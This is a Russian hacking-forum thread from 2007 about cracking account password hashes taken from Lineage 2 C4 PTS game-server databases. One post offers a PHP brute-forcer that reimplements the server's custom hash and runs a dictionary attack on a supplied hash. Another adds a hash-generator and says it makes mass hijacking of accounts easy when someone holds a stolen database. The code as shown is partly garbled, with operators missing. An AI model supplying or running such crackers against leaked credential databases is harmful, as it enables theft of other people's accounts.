шифр аккаунтов la2 c4 pts

Discussion in 'Уязвимости' started by M0rgan, 8 Jul 2007.

  1. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    У меня была БД, там шифровка сводилась к Base64
     
  2. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    Написал алгоритм выуживания пассов и коллизий. За обменом в Пм :)
    Basurman кстати прав.. первый попавшийся хеш дал 230 коллизий пароля.
     
    #22 Светлый, 10 Jul 2007
    Last edited: 10 Jul 2007
  3. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    важаемый... это не расшифровщик а брутер (подборщик)
    +платный... брут написать на пхп будет максимум 10 мин.
    не думаю что люди получившие базу хешей будут юзать этот портал... оно платное ))
    юзер получивший базу уже должен быть с мозгами...
    так что хз хз но мое мнение боян, развод... и увы будет для лохов ( (не кому не в обиду, лохов в прямом смысле, не обзывательство)
     
  4. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    Интересно будет на это посмотреть
     
  5. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Вот Вам брутер только не сорьтесь, писал сам(код брутера в конце) так, что особо не парился...=\

    use:
    Code:
    http://www.test.com/la_brute.php?[B]dict[/B]=полный_путь_до словаря.txt&[B]hash[/B]=0xb1bd38c382153333069fb9b974eec8c8
    PHP:
    <?php

    // crap! {not mine}
        
    function la_encrypt($str) {
            
    $key = array();
            
    $dst = array();
            
    $i 0;

            
    $nBytes strlen($str);
                    while (
    $i $nBytes){
                     
    $i++;
                            
    $key[$i] = ord(substr($str$i 11));
                            
    $dst[$i] = $key[$i];
            }

            
    $rslt $key[1] + $key[2]*256 $key[3]*65536 $key[4]*16777216;
            
    $one $rslt 213119 2529077;
            
    $one $one intval($one4294967296) * 4294967296;

            
    $rslt $key[5] + $key[6]*256 $key[7]*65536 $key[8]*16777216;
            
    $two $rslt 213247 2529089;
            
    $two $two intval($two4294967296) * 4294967296;

            
    $rslt $key[9] + $key[10]*256 $key[11]*65536 $key[12]*16777216;
            
    $three $rslt 213203 2529589;
            
    $three $three intval($three4294967296) * 4294967296;

            
    $rslt $key[13] + $key[14]*256 $key[15]*65536 $key[16]*16777216;
            
    $four $rslt 213821 2529997;
            
    $four $four intval($four4294967296) * 4294967296;

            
    $key[4] = intval($one/16777216);
            
    $key[3] = intval(($one $key[4] * 16777216) / 65535);
            
    $key[2] = intval(($one $key[4] * 16777216 $key[3] * 65536) / 256);
            
    $key[1] = intval(($one $key[4] * 16777216 $key[3] * 65536 $key[2] * 256));

            
    $key[8] = intval($two/16777216);
            
    $key[7] = intval(($two $key[8] * 16777216) / 65535);
            
    $key[6] = intval(($two $key[8] * 16777216 $key[7] * 65536) / 256);
            
    $key[5] = intval(($two $key[8] * 16777216 $key[7] * 65536 $key[6] * 256));

            
    $key[12] = intval($three/16777216);
            
    $key[11] = intval(($three $key[12] * 16777216) / 65535);
            
    $key[10] = intval(($three $key[12] * 16777216 $key[11] * 65536) / 256);
            
    $key[9] = intval(($three $key[12] * 16777216 $key[11] * 65536 $key[10] * 256));

            
    $key[16] = intval($four/16777216);
            
    $key[15] = intval(($four $key[16] * 16777216) / 65535);
            
    $key[14] = intval(($four $key[16] * 16777216 $key[15] * 65536) / 256);
            
    $key[13] = intval(($four $key[16] * 16777216 $key[15] * 65536 $key[14] * 256));

            
    $dst[1] = $dst[1] ^ $key[1];

            
    $i=1;
            while (
    $i<16){
                    
    $i++;
                    
    $dst[$i] = $dst[$i] ^ $dst[$i-1] ^ $key[$i];
            }

            
    $i=0;
            while (
    $i<16){
                    
    $i++;
                    if (
    $dst[$i] == 0) {
                            
    $dst[$i] = 102;
                    }
            }

            
    $encrypt "0x";
            
    $i=0;
            while (
    $i<16){
                    
    $i++;
                    if (
    $dst[$i] < 16) {
                            
    $encrypt $encrypt "0" dechex($dst[$i]);
                    } else {
                            
    $encrypt $encrypt dechex($dst[$i]);
                    }
            }

            return 
    $encrypt;
        }
    //Сам брут
        
    $dict $_GET['dict'];
        
    $hash $_GET['hash'];
        
    $fd fopen($dict,"r");
        while(
    $pass fgets($fd))
        {
            if(
    $hash == la_encrypt(trim($pass)))
            {
                echo 
    "Password is: ".$pass;
                exit();
            }
        }
        echo 
    "Password not found!";
        
    fclose($fd);
    ?>
     
    1 person likes this.
  6. mindw0rk

    mindw0rk Elder - Старейшина

    Joined:
    8 Jun 2007
    Messages:
    63
    Likes Received:
    50
    Reputations:
    1
    Хм, на одной фришке, помню, вообще шифрования небыло. Как vorishka и сказал, только base64.
     
  7. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    =удалил= =)

    по поводу 10 секунд... сорци в инете обычного брута найти не тяжело... если есть мозги - подредактишь чуть чуть...
    по поводу предупреждения... что же тогда будет? прошу все ответы и недовольствия писать в пм...

    Шедоу спасибо за брут =)
    может позже свой вариант выложу если найду )
     
    #27 M0rgan, 23 Aug 2007
    Last edited: 23 Aug 2007
  8. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    По поводу хешей в Base64 - такие хеши используются в mysql ява серверов

    PHP:
        function CreateGamePass($password)
        {
           
    $gamepass base64_encode(pack("H*"sha1(utf8_encode($password))));
            return 
    $gamepass;
        }
    По поводу брутера хешей ПТС- можно сделать так, чтобы он выдавал пароль или коллизию практически мгновенно, без словаря
     
    #28 Светлый, 23 Aug 2007
    Last edited: 23 Aug 2007
  9. Shagon

    Shagon New Member

    Joined:
    22 Jul 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Будет легче понять что за кодировка если знать пароль. Создай акк с пассом например 123 и пробуй декодировать его хеш по разным алгоритмам(с символами 0-9 сответствено). Я на джаве линейджевской так делал получил Sha-1(в PasswordPro есть).
     
    #29 Shagon, 23 Aug 2007
    Last edited: 23 Aug 2007
  10. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    легче будет не регить акк а просто скриптом его акриптовать )
    кстате так удобно массово угонять акки если есть целая база...
    закриптовать например 123456 и в поиск =)

    скрипт можно сделать чтото типа такого )
    Code:
    <?
    require "la_encrypt.php";
    $pass = $_GET['pass'];
    $hash = la_encrypt($pass);
    echo ($hash);
    ?>
     
  11. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    перед тем как сюда отписывать надо было сходить к окулисту... тебя просили писать в пм...
    я еще раз повторю что мне пох кто он. вот ты реально чмо, лезешь,защищаешь других... по поводу "НЕЧЕГО НЕ ИМЕЕШЬ" -поверь имею, но не в инете ;) нехер тут чушь мелить даж не зная нечего.
    по поводу лохов опять читай выше... я говорил не он а тот кто там по смс (раньше так было) приколам все делал... что для тебя бесплатно, у тебя то и база какаято врядле есть, кроме тех что 2 года паблика...

    короче запарило тебе писать, до тебя,тупого не дойдет )
    хочешь чтото сказть - ПРОШУ ПМ, ПРОШУ ПМ, ПРОШУ ПМ (с третего раза дойдет думаю)
    там я тебе дам асю - и ты мне все выскажешь... захочешь поугражать - ок...
    дальше отписуй только по теме...

    ссылку твою уже похожу удалили...
    зашел на тот сайт и вот нашел

    Для полного брута по (a-zA-Z0-9), нужен ключ.
    Ключ получаемый по SMS(форма выше) действителен на 3 брута.
    так что читай внимательно, потом гон начинай...
    еще раз ПРОШУ НАПИСАТЬ ПМ =))
     
    1 person likes this.